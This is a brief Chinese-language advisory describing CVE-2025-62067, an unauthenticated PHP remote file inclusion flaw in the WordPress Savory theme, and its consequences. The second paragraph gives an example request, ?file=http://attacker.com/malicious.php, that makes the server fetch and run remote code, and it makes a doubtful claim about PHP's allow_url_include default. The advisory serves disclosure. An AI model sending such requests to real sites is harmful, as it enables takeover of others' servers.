CVE-2025-62067CVE-2025-62067是WordPress Savory主题中的一个高危安全漏洞,CVSS评分达到8.1分。该漏洞属于PHP远程文件包含(Remote File Inclusion)类型,存在于Savory主题的2.5及以下所有版本中。漏洞的根本原因是在PHP程序中,对include/require语句的文件名参数缺乏适当的控制机制。攻击者可以通过构造恶意请求,利用该漏洞远程包含并执行任意PHP代码,从而完全控制受影响的Web服务器。由于该漏洞无需认证即可利用,且对机密性、完整性和可用性都造成严重影响,因此被评定为高危漏洞。Savory主题是一款由Elated-Themes开发的WordPress商业主题,广泛应用于各类网站,此次漏洞影响了大量使用该主题的网站安全。
该漏洞是典型的PHP远程文件包含(RFI)漏洞。在PHP应用程序中,include、require、include_once和require_once等文件包含函数在处理用户输入时,如果未对输入参数进行严格的安全验证,攻击者就可以通过构造恶意参数来包含远程服务器上的文件。在Savory主题中,某个PHP文件直接使用用户可控的输入作为文件路径传递给include/require语句,攻击者可以通过URL参数或POST数据注入恶意路径。例如,攻击者可以构造类似?file=http://attacker.com/malicious.php的请求,服务器会尝试包含并执行远程服务器上的PHP文件。由于PHP的allow_url_include配置默认可能被启用或通过其他方式绕过,攻击者能够实现远程代码执行。成功利用此漏洞后,攻击者可以在服务器上执行任意系统命令、读取敏感配置文件、上传webshell,甚至完全控制服务器。